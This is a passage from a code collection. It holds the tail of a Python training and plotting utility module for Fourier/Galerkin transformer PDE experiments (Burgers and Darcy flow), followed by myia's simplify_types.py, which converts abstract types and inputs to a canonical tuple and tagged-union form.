# $M_{ij}|_{\tau} = \int_{\tau}K \phi_i \cdot \phi_j dx$ \
Mij = h*K*((i == j)+1)/6
M += csr_matrix((Mij, (elem[:, i], elem[:, j])), shape=(N, N))
if normalize:
D = diags(M.diagonal()**(-0.5))
M = (D.dot(M)).dot(D)
return M
def showmesh(node, elem, **kwargs):
triangulation = tri.Triangulation(node[:, 0], node[:, 1], elem)
markersize = 3000/len(node)
if kwargs.items():
h = plt.triplot(triangulation, 'b-h', **kwargs)
else:
h = plt.triplot(triangulation, 'b-h', linewidth=0.5,
alpha=0.5, markersize=markersize)
return h
def showsolution(node, elem, u, **kwargs):
'''
show 2D solution either of a scalar function or a vector field
on triangulations
'''
markersize = 3000/len(node)
if u.ndim == 1: # (N, )
uplot = ff.create_trisurf(x=node[:, 0], y=node[:, 1], z=u,
simplices=elem,
colormap="Viridis", # similar to matlab's default colormap
showbackground=True,
show_colorbar=False,
aspectratio=dict(x=1, y=1, z=1),
)
fig = go.Figure(data=uplot)
elif u.ndim == 2 and u.shape[1] == 2: # (N, 2)
if u.shape[0] == elem.shape[0]:
u /= (np.abs(u)).max()
node = node[elem].mean(axis=1)
uplot = ff.create_quiver(x=node[:, 0], y=node[:, 1],
u=u[:, 0], v=u[:, 1],
scale=.2,
arrow_scale=.5,
name='gradient of u',
line_width=1,
)
fig = go.Figure(data=uplot)
if 'template' not in kwargs.keys():
fig.update_layout(template='plotly_dark',
margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
else:
fig.update_layout(margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
fig.show()
def showsurf(x, y, z, **kwargs):
'''
show 2D solution either of a scalar function or a vector field
on a meshgrid
x, y, z: (M, N) matrix
'''
uplot = go.Surface(x=x, y=y, z=z,
colorscale='Viridis',
showscale=False),
fig = go.Figure(data=uplot)
if 'template' not in kwargs.keys():
fig.update_layout(template='plotly_dark',
margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
else:
fig.update_layout(margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
fig.show()
def showcontour(z, **kwargs):
'''
show 2D solution z of its contour
'''
uplot = go.Contour(z=z,
colorscale='RdYlBu',
line_smoothing=0.85,
line_width=0.1,
contours=dict(
coloring='heatmap',
# showlabels=True,
)
)
fig = go.Figure(data=uplot,
layout={'xaxis': {'title': 'x-label',
'visible': False,
'showticklabels': False},
'yaxis': {'title': 'y-label',
'visible': False,
'showticklabels': False}},)
fig.update_traces(showscale=False)
if 'template' not in kwargs.keys():
fig.update_layout(template='plotly_dark',
margin=dict(l=0, r=0, t=0, b=0),
**kwargs)
else:
fig.update_layout(margin=dict(l=0, r=0, t=0, b=0),
**kwargs)
fig.show()
return fig
def showresult(result=dict(), title=None, result_type='convergence',
u=None, uh=None, grid=None, elem=None):
rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
rc('text', usetex=True)
jtplot.style(theme='grade3', context='notebook', ticks=True, grid=False)
if result_type == 'convergence':
loss_train = result['loss_train']
loss_val = result['loss_val']
train_label = r"$\mathrm{Train}: {E}\left( \displaystyle\|u_f - u_h\|_{\alpha, h, 1} \right)$"
plt.semilogy(loss_train, label=train_label)
val_label = r'$\mathrm{Valid}: \|T_f - T_h\|_{-1, V_h}$'
plt.semilogy(loss_val, label=val_label)
plt.grid(True, which="both", ls="--")
plt.legend(fontsize='x-large')
if title == 'fourier':
title_str = r"$\mathrm{Fourier}\ \mathrm{transformer}$"
elif title == 'galerkin':
title_str = r"$\mathrm{Galerkin}\ \mathrm{transformer}$"
elif title == 'spectral':
title_str = r"$\mathrm{Fourier}\ \mathrm{neural}\ \mathrm{operator}$"
else:
title_str = r"$\mathrm{Loss}\ \mathrm{result}$"
plt.title(title_str, fontsize='xx-large')
elif result_type == 'solutions':
sample_len = len(u)
i = np.random.choice(sample_len)
u = u[i].cpu().numpy().reshape(-1)
uh = uh[i].cpu().numpy().reshape(-1)
showsolution(grid, elem, u, template='seaborn', width=600, height=500)
showsolution(grid, elem, uh, template='seaborn',
width=600, height=500,)
def get_model_name(model='burgers',
num_encoder_layers=4,
n_hidden=96,
attention_type='fourier',
layer_norm=True,
grid_size=512,
inverse_problem=False,
additional_str: str = '',
):
model_name = 'burgers_' if model == 'burgers' else 'darcy_'
if inverse_problem:
model_name += 'inv_'
model_name += str(grid_size)+'_'
if attention_type == 'fourier':
attn_str = f'{num_encoder_layers}ft_'
elif attention_type == 'galerkin':
attn_str = f'{num_encoder_layers}gt_'
elif attention_type == 'linear':
attn_str = f'{num_encoder_layers}lt_'
elif attention_type == 'softmax':
attn_str = f'{num_encoder_layers}st_'
else:
attn_str = f'{num_encoder_layers}att_'
model_name += attn_str
model_name += f'{n_hidden}d_'
ln_str = 'ln_' if layer_norm else 'qkv_'
model_name += ln_str
if additional_str:
model_name += additional_str
_suffix = str(date.today())
if model_name[-1] == '_':
result_name = model_name + _suffix + '.pkl'
model_name += _suffix + '.pt'
else:
result_name = model_name + '_' + _suffix + '.pkl'
model_name += '_' + _suffix + '.pt'
return model_name, result_name
def get_args_1d():
parser = argparse.ArgumentParser(description='Example 1: Burgers equation')
parser.add_argument('--subsample', type=int, default=4, metavar='subsample',
help='input sampling from 8192 (default: 4 i.e., 2048 grid)')
parser.add_argument('--batch-size', type=int, default=8, metavar='bsz',
help='input batch size for training (default: 8)')
parser.add_argument('--val-batch-size', type=int, default=4, metavar='bsz',
help='input batch size for validation (default: 4)')
parser.add_argument('--attention-type', type=str, default='fourier', metavar='attn_type',
help='input attention type for encoders (possile: fourier (alias integral, local), galerkin (alias global), softmax (official PyTorch implementation), linear (standard Q(K^TV) with softmax), default: fourier)')
parser.add_argument('--xavier-init', type=float, default=0.01, metavar='xavier_init',
help='input Xavier initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--diagonal-weight', type=float, default=0.01, metavar='diagonal weight',
help='input diagonal weight initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--ffn-dropout', type=float, default=0.0, metavar='ffn_dropout',
help='dropout for the FFN in attention (default: 0.0)')
parser.add_argument('--encoder-dropout', type=float, default=0.0, metavar='encoder_dropout',
help='dropout after the scaled dot-product in attention (default: 0.0)')
parser.add_argument('--decoder-dropout', type=float, default=0.0, metavar='decoder_dropout',
help='dropout for the decoder layers (default: 0.0)')
parser.add_argument('--layer-norm', action='store_true', default=False,
help='use the conventional layer normalization')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='max learning rate (default: 0.001)')
parser.add_argument('--gamma', type=float, default=0.1, metavar='regularizer',
help='strength of gradient regularizer (default: 0.1)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--show-batch', action='store_true', default=False,
help='show batch training result')
parser.add_argument('--seed', type=int, default=SEED, metavar='Seed',
help='random seed (default: 1127802)')
return parser.parse_args()
def get_args_2d(subsample_nodes=3,
subsample_attn=10,
gamma=0.5,
noise=0.0,
ffn_dropout=0.1,
encoder_dropout=0.05,
decoder_dropout=0.0,
dropout=0.0,
inverse=False,
**kwargs):
if inverse:
parser = argparse.ArgumentParser(
description='Example 3: inverse coefficient identification problem for Darcy interface flow')
else:
parser = argparse.ArgumentParser(
description='Example 2: Darcy interface flow')
n_grid = int(((421 - 1)/subsample_nodes) + 1)
n_grid_c = int(((421 - 1)/subsample_attn) + 1)
parser.add_argument('--subsample-nodes', type=int, default=subsample_nodes, metavar='subsample',
help=f'input fine grid sampling from 421x421 (default: {subsample_nodes} i.e., {n_grid}x{n_grid} grid)')
parser.add_argument('--subsample-attn', type=int, default=6, metavar='subsample_attn',
help=f'input coarse grid sampling from 421x421 (default: {subsample_attn} i.e., {n_grid_c}x{n_grid_c} grid)')
parser.add_argument('--batch-size', type=int, default=4, metavar='bsz',
help='input batch size for training (default: 4)')
parser.add_argument('--val-batch-size', type=int, default=4, metavar='bsz',
help='input batch size for validation (default: 4)')
parser.add_argument('--attention-type', type=str, default='galerkin', metavar='attn_type',
help='input attention type for encoders (possile: fourier (alias integral, local), galerkin (alias global), softmax (official PyTorch implementation), linear (standard Q(K^TV) with softmax), default: galerkin)')
parser.add_argument('--noise', type=float, default=noise, metavar='noise',
help=f'strength of noise imposed (default: {noise})')
parser.add_argument('--xavier-init', type=float, default=1e-2, metavar='xavier_init',
help='input Xavier initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--diagonal-weight', type=float, default=1e-2, metavar='diagonal weight',
help='input diagonal weight initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--ffn-dropout', type=float, default=ffn_dropout, metavar='ffn_dropout',
help=f'dropout for the FFN in attention (default: {ffn_dropout})')
parser.add_argument('--encoder-dropout', type=float, default=encoder_dropout, metavar='encoder_dropout',
help=f'dropout after the scaled dot-product in attention (default: {encoder_dropout})')
parser.add_argument('--dropout', type=float, default=dropout, metavar='dropout',
help=f'dropout before the decoder layers (default: {dropout})')
parser.add_argument('--decoder-dropout', type=float, default=decoder_dropout, metavar='decoder_dropout',
help=f'dropout in the decoder layers (default: {decoder_dropout})')
parser.add_argument('--layer-norm', action='store_true', default=False,
help='use the conventional layer normalization')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=1e-3, metavar='LR',
help='max learning rate (default: 0.001)')
parser.add_argument('--gamma', type=float, default=gamma, metavar='regularizer',
help=f'strength of gradient regularizer (default: {gamma})')
parser.add_argument('--no-scale-factor', action='store_true', default=False,
help='use size instead of scale factor in interpolation')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--show-batch', action='store_true', default=False,
help='show batch training result')
parser.add_argument('--seed', type=int, default=SEED, metavar='Seed',
help='random seed (default: 1127802)')
return parser.parse_args()
def train_batch_burgers(model, loss_func, data, optimizer, lr_scheduler, device, grad_clip=0.999):
optimizer.zero_grad()
x, edge = data["node"].to(device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
out_ = model(x, edge, pos, grid)
if isinstance(out_, dict):
out = out_['preds']
y_latent = out_['preds_latent']
elif isinstance(out_, tuple):
out = out_[0]
y_latent = None
target = data["target"].to(device)
u, up = target[..., 0], target[..., 1]
if out.size(2) == 2:
u_pred, up_pred = out[..., 0], out[..., 1]
loss, reg, ortho, _ = loss_func(
u_pred, u, up_pred, up, preds_latent=y_latent)
elif out.size(2) == 1:
u_pred = out[..., 0]
loss, reg, ortho, _ = loss_func(
u_pred, u, targets_prime=up, preds_latent=y_latent)
loss = loss + reg + ortho
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), grad_clip)
optimizer.step()
if lr_scheduler:
lr_scheduler.step()
try:
up_pred = out[..., 1]
except:
up_pred = u_pred
return (loss.item(), reg.item(), ortho.item()), u_pred, up_pred
def validate_epoch_burgers(model, metric_func, valid_loader, device):
model.eval()
metric_val = []
for _, data in enumerate(valid_loader):
with torch.no_grad():
x, edge = data["node"].to(device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
out_ = model(x, edge, pos, grid)
if isinstance(out_, dict):
u_pred = out_['preds'][..., 0]
elif isinstance(out_, tuple):
u_pred = out_[0][..., 0]
target = data["target"].to(device)
u = target[..., 0]
_, _, _, metric = metric_func(u_pred, u)
try:
metric_val.append(metric.item())
except:
metric_val.append(metric)
return dict(metric=np.mean(metric_val, axis=0))
def train_batch_darcy(model, loss_func, data, optimizer, lr_scheduler, device, grad_clip=0.99):
optimizer.zero_grad()
a, x, edge = data["coeff"].to(device), data["node"].to(
device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
u, gradu = data["target"].to(device), data["target_grad"].to(device)
# pos is for attention, grid is the finest grid
out_ = model(x, edge, pos=pos, grid=grid)
if isinstance(out_, dict):
out = out_['preds']
elif isinstance(out_, tuple):
out = out_[0]
if out.ndim == 4:
u_pred, pred_grad, target = out[..., 0], out[..., 1:], u[..., 0]
loss, reg, _, _ = loss_func(u_pred, target, pred_grad, gradu, K=a)
elif out.ndim == 3:
u_pred, u = out[..., 0], u[..., 0]
loss, reg, _, _ = loss_func(u_pred, u, targets_prime=gradu, K=a)
loss = loss + reg
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), grad_clip)
optimizer.step()
if lr_scheduler:
lr_scheduler.step()
try:
up_pred = out[..., 1:]
except:
up_pred = u_pred
return (loss.item(), reg.item()), u_pred, up_pred
def validate_epoch_darcy(model, metric_func, valid_loader, device):
model.eval()
metric_val = []
for _, data in enumerate(valid_loader):
with torch.no_grad():
x, edge = data["node"].to(device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
out_ = model(x, edge, pos=pos, grid=grid)
if isinstance(out_, dict):
out = out_['preds']
elif isinstance(out_, tuple):
out = out_[0]
u_pred = out[..., 0]
target = data["target"].to(device)
u = target[..., 0]
_, _, metric, _ = metric_func(u_pred, u)
try:
metric_val.append(metric.item())
except:
metric_val.append(metric)
return dict(metric=np.mean(metric_val, axis=0))
def run_train(model, loss_func, metric_func,
train_loader, valid_loader,
optimizer, lr_scheduler,
train_batch=None,
validate_epoch=None,
epochs=10,
device="cuda",
mode='min',
tqdm_mode='batch',
patience=10,
grad_clip=0.999,
start_epoch: int = 0,
model_save_path=MODEL_PATH,
save_mode='state_dict', # 'state_dict' or 'entire'
model_name='model.pt',
result_name='result.pt'):
loss_train = []
loss_val = []
loss_epoch = []
lr_history = []
it = 0
if patience is None or patience == 0:
patience = epochs
start_epoch = start_epoch
end_epoch = start_epoch + epochs
best_val_metric = -np.inf if mode == 'max' else np.inf
best_val_epoch = None
save_mode = 'state_dict' if save_mode is None else save_mode
stop_counter = 0
is_epoch_scheduler = any(s in str(lr_scheduler.__class__)
for s in EPOCH_SCHEDULERS)
tqdm_epoch = False if tqdm_mode == 'batch' else True
with tqdm(total=end_epoch-start_epoch, disable=not tqdm_epoch) as pbar_ep:
for epoch in range(start_epoch, end_epoch):
model.train()
with tqdm(total=len(train_loader), disable=tqdm_epoch) as pbar_batch:
for batch in train_loader:
if is_epoch_scheduler:
loss, _, _ = train_batch(model, loss_func,
batch, optimizer,
None, device, grad_clip=grad_clip)
else:
loss, _, _ = train_batch(model, loss_func,
batch, optimizer,
lr_scheduler, device, grad_clip=grad_clip)
loss = np.array(loss)
loss_epoch.append(loss)
it += 1
lr = optimizer.param_groups[0]['lr']
lr_history.append(lr)
desc = f"epoch: [{epoch+1}/{end_epoch}]"
if loss.ndim == 0: # 1 target loss
_loss_mean = np.mean(loss_epoch)
desc += f" loss: {_loss_mean:.3e}"
else:
_loss_mean = np.mean(loss_epoch, axis=0)
for j in range(len(_loss_mean)):
if _loss_mean[j] > 0:
desc += f" | loss {j}: {_loss_mean[j]:.3e}"
desc += f" | current lr: {lr:.3e}"
pbar_batch.set_description(desc)
pbar_batch.update()
loss_train.append(_loss_mean)
# loss_train.append(loss_epoch)
loss_epoch = []
val_result = validate_epoch(
model, metric_func, valid_loader, device)
loss_val.append(val_result["metric"])
val_metric = val_result["metric"].sum()
if mode == 'max':
if val_metric > best_val_metric:
best_val_epoch = epoch
best_val_metric = val_metric
stop_counter = 0
else:
stop_counter += 1
else:
if val_metric < best_val_metric:
best_val_epoch = epoch
best_val_metric = val_metric
stop_counter = 0
if save_mode == 'state_dict':
torch.save(model.state_dict(), os.path.join(
model_save_path, model_name))
else:
torch.save(model, os.path.join(
model_save_path, model_name))
best_model_state_dict = {
k: v.to('cpu') for k, v in model.state_dict().items()}
best_model_state_dict = OrderedDict(best_model_state_dict)
else:
stop_counter += 1
if lr_scheduler and is_epoch_scheduler:
if 'ReduceLROnPlateau' in str(lr_scheduler.__class__):
lr_scheduler.step(val_metric)
else:
lr_scheduler.step()
if stop_counter > patience:
print(f"Early stop at epoch {epoch}")
break
if val_result["metric"].ndim == 0:
desc = color(
f"| val metric: {val_metric:.3e} ", color=Colors.blue)
else:
metric_0, metric_1 = val_result["metric"][0], val_result["metric"][1]
desc = color(
f"| val metric 1: {metric_0:.3e} ", color=Colors.blue)
desc += color(f"| val metric 2: {metric_1:.3e} ",
color=Colors.blue)
desc += color(
f"| best val: {best_val_metric:.3e} at epoch {best_val_epoch+1}", color=Colors.yellow)
desc += color(f" | early stop: {stop_counter} ", color=Colors.red)
desc += color(f" | current lr: {lr:.3e}", color=Colors.magenta)
if not tqdm_epoch:
tqdm.write("\n"+desc+"\n")
else:
desc_ep = color("", color=Colors.green)
if _loss_mean.ndim == 0: # 1 target loss
desc_ep += color(f"| loss: {_loss_mean:.3e} ",
color=Colors.green)
else:
for j in range(len(_loss_mean)):
if _loss_mean[j] > 0:
desc_ep += color(
f"| loss {j}: {_loss_mean[j]:.3e} ", color=Colors.green)
desc_ep += desc
pbar_ep.set_description(desc_ep)
pbar_ep.update()
result = dict(
best_val_epoch=best_val_epoch,
best_val_metric=best_val_metric,
loss_train=np.asarray(loss_train),
loss_val=np.asarray(loss_val),
lr_history=np.asarray(lr_history),
# best_model=best_model_state_dict,
optimizer_state=optimizer.state_dict()
)
save_pickle(result, os.path.join(model_save_path, result_name))
return result
class ProfileResult:
def __init__(self, result_file,
num_iters=1,
cuda=True) -> None:
'''
Hard-coded result computation based on torch.autograd.profiler
text printout, only works PyTorch 1.8.1
'''
self.columns = ['Name', 'Self CPU %', 'Self CPU',
'CPU total %', 'CPU total', 'CPU time avg',
'Self CUDA', 'Self CUDA %', 'CUDA total', 'CUDA time avg',
'CPU Mem', 'Self CPU Mem', 'CUDA Mem', 'Self CUDA Mem',
'# of Calls']
self.df = pd.read_csv(result_file,
delim_whitespace=True,
skiprows=range(5),
header=None)
self.num_iters = num_iters
self.cuda = cuda
self._clean_df()
def _clean_df(self):
df = self.df
if self.cuda:
df.loc[:, 16] = df.loc[:, 16].astype(str) + df.loc[:, 17]
df.loc[:, 14] = df.loc[:, 14].astype(str) + df.loc[:, 15]
df.loc[:, 12] = df.loc[:, 12].astype(str) + df.loc[:, 13]
df.loc[:, 10] = df.loc[:, 10].astype(str) + df.loc[:, 11]
df = df.drop(columns=[11, 13, 15, 17]
) if self.cuda else df.drop(columns=[11, 13])
self.cpu_time_total = df.iloc[-2, 4]
if self.cuda:
self.cuda_time_total = df.iloc[-1, 4]
df = df[:-3].copy()
df.columns = self.columns
self.df = df
def compute_total_mem(self, col_names):
total_mems = []
for col_name in col_names:
total_mem = 0
col_vals = self.df[col_name].values
for val in col_vals:
if val[-2:] == 'Gb':
total_mem += self.get_str_val(val[:-2])
elif val[-2:] == 'Mb':
total_mem += self.get_str_val(val[:-2])/1e3
total_mems.append(round(total_mem, 2))
return total_mems
def compute_total_time(self, col_names):
total_times = []
for col_name in col_names:
total_time = 0
col_vals = self.df[col_name].values
for val in col_vals:
if val[-2:] == 'ms':
total_time += float(val[:-2])
elif val[-2:] == 'us':
total_time += float(val[:-2])/1e3
total_times.append(round(total_time, 2))
return total_times
def print_total_mem(self, col_names):
total_mems = self.compute_total_mem(col_names)
for i, col_name in enumerate(col_names):
print(f"{col_name} total: {total_mems[i]} GB")
def print_total(self, col_names):
total_times = self.compute_total_time(col_names)
for i, col_name in enumerate(col_names):
print(f"{col_name} total: {total_times[i]} ms")
def print_total_time(self):
print(f"# of backprop iters: {self.num_iters}")
print(f"CPU time total: {self.cpu_time_total}")
if self.cuda:
print(f"CUDA time total: {self.cuda_time_total}")
@staticmethod
def get_str_val(string):
if string[0] == '-':
return -float(string[1:])
else:
return float(string)
if __name__ == '__main__':
get_seed(42)
``` |
{
"source": "Jimmy-INL/myia",
"score": 2
} |
#### File: myia/myia/simplify_types.py
```python
import weakref
from itertools import count
from ovld import ovld
from . import xtype
from .abstract import (
ANYTHING,
TYPE,
VALUE,
AbstractArray,
AbstractClassBase,
AbstractDict,
AbstractError,
AbstractExternal,
AbstractFunctionBase,
AbstractHandle,
AbstractKeywordArgument,
AbstractRandomState,
AbstractScalar,
AbstractTaggedUnion,
AbstractTuple,
AbstractType,
AbstractUnion,
AbstractValue,
abstract_clone,
empty,
from_value,
split_type,
type_to_abstract,
typecheck,
)
from .classes import Cons, Empty
from .compile import BackendValue
from .ir import Constant
from .operations import primitives as P
from .utils import HandleInstance, MyiaInputTypeError, TaggedValue
from .utils.misc import RandomStateWrapper
from .xtype import Int, NDArray, String
####################
# Tags and symbols #
####################
_idx = count()
_tagmap = weakref.WeakKeyDictionary()
def type_to_tag(t):
"""Return the numeric tag associated to the given type."""
if t not in _tagmap:
_tagmap[t] = next(_idx)
return _tagmap[t]
_tagmap_str = {}
_strmap_tag = {}
def str_to_tag(t):
"""Return the numeric tag associated to the given type."""
if t not in _tagmap_str:
s = len(_tagmap_str)
_tagmap_str[t] = s
_strmap_tag[s] = t
return _tagmap_str[t]
#########
# Reabs #
#########
@abstract_clone.variant
def _reabs(self, a: AbstractClassBase):
return (yield AbstractTuple)(self(x) for x in a.attributes.values())
@ovld # noqa: F811
def _reabs(self, a: AbstractScalar):
new_values = self(a.values)
if a.xtype() == String:
v = a.xvalue()
if v is not ANYTHING:
v = str_to_tag(v)
return AbstractScalar({**new_values, VALUE: v, TYPE: Int[64]})
else:
return AbstractScalar(new_values)
@ovld # noqa: F811
def _reabs(self, a: AbstractDict):
return (yield AbstractTuple)(self(x) for x in a.entries.values())
@ovld # noqa: F811
def _reabs(self, a: AbstractArray):
return (yield AbstractArray)(
self(a.element), {**self(a.values), TYPE: NDArray}
)
@ovld # noqa: F811
def _reabs(self, a: AbstractUnion):
return (yield AbstractTaggedUnion)(
[type_to_tag(opt), self(opt)] for opt in a.options
)
@ovld # noqa: F811
def _reabs(self, a: AbstractKeywordArgument):
return self(a.argument)
##################
# Simplify types #
##################
def simplify_types(root, manager):
r"""Simplify the set of types that can be found in the graph.
* Replace AbstractClass by AbstractTuple:
* Class[x: t, ...] => Tuple[t, ...]
* record_getitem(data, attr) => tuple_getitem(data, idx)
* record_setitem(data, attr, value) => tuple_setitem(data, idx, value)
* make_record(cls, \*args) => make_tuple(\*args)
* Replace AbstractDict by AbstractTuple:
* Dict[x: t, ...] => Tuple[t, ...]
* dict_getitem(data, item) => tuple_getitem(data, idx)
* dict_setitem(data, item, value) => tuple_setitem(data, idx, value)
* make_dict(cls, \*args) => make_tuple(\*args)
* Replace AbstractUnion by AbstractTaggedUnion:
* Union[a, b, c, ...] => TaggedUnion[1 => a, 2 => b, 3 => c, ...]
* hastype(x, type) => hastag(x, tag)
=> bool_or(hastag(x, tag1), hastag(x, tag2), ...)
* unsafe_static_cast(x, type) => casttag(x, tag)
"""
manager.add_graph(root)
for node in list(manager.all_nodes):
new_node = None
keep_abstract = True
def _mkct(idx):
idx_c = Constant(idx)
idx_c.abstract = AbstractScalar({VALUE: idx, TYPE: Int[64]})
return idx_c
def _record_makeindex(dt, attr):
assert isinstance(dt, AbstractClassBase)
idx = list(dt.attributes.keys()).index(attr)
return _mkct(idx)
def _dict_makeindex(dt, attr):
assert isinstance(dt, AbstractDict)
idx = list(dt.entries.keys()).index(attr)
return _mkct(idx)
if node.is_apply(P.record_getitem):
_, data, item = node.inputs
idx_c = _record_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_getitem, data, idx_c)
elif node.is_apply(P.dict_getitem):
_, data, item = node.inputs
idx_c = _dict_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_getitem, data, idx_c)
elif node.is_apply(P.record_setitem):
_, data, item, value = node.inputs
idx_c = _record_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_setitem, data, idx_c, value)
elif node.is_apply(P.dict_setitem):
_, data, item, value = node.inputs
idx_c = _dict_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_setitem, data, idx_c, value)
elif node.is_apply(P.make_record):
mkr, typ, *args = node.inputs
new_node = node.graph.apply(P.make_tuple, *args)
elif node.is_apply(P.make_dict):
mkr, typ, *args = node.inputs
new_node = node.graph.apply(P.make_tuple, *args)
elif node.is_apply(P.partial):
orig_ptl, oper, *args = node.inputs
if oper.is_constant() and oper.value is P.make_record:
if len(args) == 1:
new_node = Constant(P.make_tuple)
elif len(args) > 1:
new_node = node.graph.apply(
P.partial, P.make_tuple, *args[1:]
)
elif node.is_apply(P.hastype):
# hastype(x, type) -> hastag(x, tag)
_, x, typ = node.inputs
real_typ = type_to_abstract(typ.value)
matches, _ = split_type(x.abstract, real_typ)
assert not isinstance(matches, AbstractUnion)
tag = type_to_tag(matches)
new_node = node.graph.apply(P.hastag, x, _mkct(tag))
elif node.is_apply(P.unsafe_static_cast):
# unsafe_static_cast(x, type) -> casttag(x, tag)
# unsafe_static_cast(x, union_type) -> x, if x bigger union type
_, x, typ = node.inputs
assert isinstance(typ.value, AbstractValue)
if isinstance(typ.value, AbstractUnion):
new_node = x
keep_abstract = False
else:
tag = type_to_tag(typ.value)
new_node = node.graph.apply(P.casttag, x, _mkct(tag))
elif node.is_apply(P.tagged):
# tagged(x) -> tagged(x, tag)
# tagged(x, tag) -> unchanged
if len(node.inputs) == 2:
_, x = node.inputs
tag = type_to_tag(x.abstract)
new_node = node.graph.apply(P.tagged, x, _mkct(tag))
elif node.is_apply(P.string_eq):
new_node = node.graph.apply(
P.scalar_eq, node.inputs[1], node.inputs[2]
)
elif node.is_apply(P.make_kwarg):
new_node = node.inputs[2]
elif node.is_apply(P.extract_kwarg):
new_node = node.inputs[2]
elif node.is_constant((str, AbstractValue)):
new_value = to_canonical(node.value, node.abstract)
new_node = Constant(new_value)
new_node.abstract = from_value(new_value)
keep_abstract = False
if new_node is not None:
if keep_abstract:
new_node.abstract = node.abstract
manager.replace(node, new_node)
for graph in manager.graphs:
graph._sig = None
graph._user_graph = None
for node in manager.all_nodes:
if (
node.is_constant()
and node.abstract
and not isinstance(
node.abstract, (AbstractFunctionBase, AbstractExternal),
)
):
node.value = to_canonical(node.value, node.abstract, coerce=True)
node.abstract = _reabs(node.abstract)
########################
# Convert to canonical #
########################
@ovld.dispatch(type_error=MyiaInputTypeError)
def to_canonical(self, arg, orig_t, coerce=False):
"""Check and convert an argument to the canonical representation.
Arguments:
arg: The argument to convert.
orig_t: The type of the argument as returned by to_abstract.
Returns:
A version of the argument where classes/dicts become tuples
and unions are properly tagged.
"""
if isinstance(arg, BackendValue):
if not typecheck(orig_t, arg.orig_t):
raise MyiaInputTypeError("Bad type for backend value.")
return arg
fn = self[type(arg), type(orig_t), bool]
return fn(arg, orig_t, coerce)
@ovld # noqa: F811
def to_canonical(self, arg: tuple, orig_t: AbstractTuple, coerce):
oe = orig_t.elements
if len(arg) != len(oe):
raise MyiaInputTypeError(f"Expected {len(oe)} elements")
return tuple(self(x, o, coerce) for x, o in zip(arg, oe))
@ovld # noqa: F811
def to_canonical(
self, arg: RandomStateWrapper, orig_t: AbstractRandomState, coerce
):
return arg
@ovld # noqa: F811
def to_canonical(self, arg: dict, orig_t: AbstractDict, coerce):
types = orig_t.entries
if len(arg) != len(types):
raise MyiaInputTypeError(
"Dictionary input doesn't have the expected size"
)
if set(arg.keys()) != set(types.keys()):
raise MyiaInputTypeError("Mismatched keys for input dictionary.")
return tuple(self(arg[k], o, coerce) for k, o in orig_t.entries.items())
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractClassBase, coerce):
if orig_t.tag is Empty:
if arg != []:
raise MyiaInputTypeError(f"Expected empty list")
return ()
elif orig_t.tag is Cons:
if arg == []:
raise MyiaInputTypeError(f"Expected non-empty list")
if not isinstance(arg, list):
raise MyiaInputTypeError(f"Expected list")
ot = orig_t.attributes["head"]
li = list(self(x, ot, coerce) for x in arg)
rval = TaggedValue(type_to_tag(empty), ())
for elem in reversed(li):
rval = TaggedValue(type_to_tag(orig_t), (elem, rval))
return rval.value
else:
if not isinstance(arg, orig_t.tag):
raise MyiaInputTypeError(f"Expected {orig_t.tag.__qualname__}")
arg = tuple(getattr(arg, attr) for attr in orig_t.attributes)
oe = list(orig_t.attributes.values())
res = tuple(self(x, o, coerce) for x, o in zip(arg, oe))
return res
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractArray, coerce):
et = orig_t.element
assert isinstance(et, AbstractScalar)
et = et.xtype()
assert issubclass(et, (xtype.Number, xtype.Bool))
arg = orig_t.xtype().to_numpy(arg)
arg_dtype = xtype.np_dtype_to_type(str(arg.dtype))
if arg_dtype != et:
raise MyiaInputTypeError(
f"Expected array of type {et}, but got {arg_dtype}."
)
shp = orig_t.xshape()
if shp is not ANYTHING and arg.shape != shp:
raise MyiaInputTypeError(
f"Expected array with shape {shp}, but got {arg.shape}."
)
return arg
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractUnion, coerce):
for opt in orig_t.options:
try:
value = self(arg, opt, coerce)
tag = type_to_tag(opt)
except TypeError:
continue
return TaggedValue(tag, value)
else:
opts = ", ".join(map(str, orig_t.options))
raise MyiaInputTypeError(f"Expected one of {opts}, not {arg}")
# @ovld # noqa: F811
# def to_canonical(self, arg, orig_t: AbstractHandle, coerce):
# if not isinstance(arg, HandleInstance):
# raise MyiaInputTypeError(f"Expected handle")
# arg.state = self(arg.state, orig_t.element, coerce)
# return arg
@ovld # noqa: F811
def to_canonical(self, arg: HandleInstance, orig_t: AbstractHandle, coerce):
arg.state = self(arg.state, orig_t.element, coerce)
return arg
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractScalar, coerce):
if not typecheck(orig_t, from_value(arg)):
xt = orig_t.xtype()
if coerce and issubclass(xt, xtype.Number):
# TODO: Actually coerce the arg to the proper dtype instead
# of returning it unchanged.
return arg
else:
raise MyiaInputTypeError(
f"Scalar has wrong type: expected {orig_t}, got {arg}"
)
